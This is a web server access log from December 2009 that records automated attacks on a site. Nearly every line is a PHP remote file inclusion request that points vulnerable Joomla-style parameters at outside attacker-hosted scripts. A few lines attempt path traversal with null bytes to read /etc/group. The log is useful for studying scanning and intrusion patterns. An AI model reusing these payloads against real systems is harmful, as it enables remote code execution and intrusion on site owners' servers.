174.142.120.149 - - [20/Dec/2009:22:34:31 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "galf.org"
174.142.120.149 - - [20/Dec/2009:22:34:31 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "galf.org"
69.16.239.36 - - [20/Dec/2009:22:34:31 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:31 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:22:34:31 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:34 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:36 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:34:36 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.142.120.149 - - [20/Dec/2009:22:34:36 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "galf.org"
174.142.120.149 - - [20/Dec/2009:22:34:36 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:37 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:37 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:37 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:37 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:42 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:46 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:51 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:51 -0800] "GET /logs/access_090629.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:51 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:51 -0800] "GET /logs/access_090921.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:52 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:52 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:52 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:34:53 -0800] "GET /logs/access_090810.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:57 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:57 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:57 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:58 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:35:00 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:35:00 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:35:00 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:35:00 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:35:00 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:35:00 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:35:10 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:35:13 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:35:15 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:35:15 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:35:15 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:35:22 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:35:32 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:35:32 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:35:32 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:35:32 -0800] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:35:32 -0800] "GET /logs/access_090720.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:36:06 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:36:06 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:36:06 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:36:16 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:36:16 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:36:16 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:36:44 -0800] "GET /logs/access_090720.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:36:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:36:55 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:36:55 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:37:06 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:37:06 -0800] "GET /logs//components/com_freechat/chatwindow.php?uebergabe=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
93.190.41.97 - - [20/Dec/2009:22:37:07 -0800] "GET /logs/access_091130.log//components/com_freechat/chatwindow.php?uebergabe=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:23 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:24 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:37:25 -0800] "GET /logs/access_091109.log////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:37:34 -0800] "GET /logs/access_091109.log////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:37:35 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:37:35 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:37:35 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs/access_090810.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:42 -0800] "GET /logs/access_090810.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:43 -0800] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:45 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:48 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:48 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:48 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:49 -0800] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:50 -0800] "GET /logs/access_090629.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:50 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:50 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:51 -0800] "GET /logs/access_090921.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:52 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:52 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:52 -0800] "GET /logs/access_090629.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:37:52 -0800] "GET /logs/access_090921.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:37:58 -0800] "GET /logs/access_090706.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:37:58 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:37:58 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:38:11 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:38:11 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:38:15 -0800] "GET /logs/access_090608.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:41 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:41 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:41 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:41 -0800] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:45 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:45 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:46 -0800] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:38:49 -0800] "GET /logs/access_090629.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:38:50 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:38:50 -0800] "GET /logs/access_090608.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:38:50 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:39:57 -0800] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:39:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:39:57 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:39:58 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:39:58 -0800] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.72 - - [20/Dec/2009:22:39:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:22:39:58 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:22:39:59 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:40:13 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:40:13 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:40:13 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:40:32 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:40:32 -0800] "GET /logs/access_090928.log%20%20/?_SERVER%5BDOCUMENT_ROOT%5D=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:40:32 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:22:40:52 -0800] "GET /logs/access_090928.log/?_SERVER%5BDOCUMENT_ROOT%5D=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:40:59 -0800] "GET /logs/access_090921.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:41:03 -0800] "GET /logs/access_090921.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:22:41:09 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
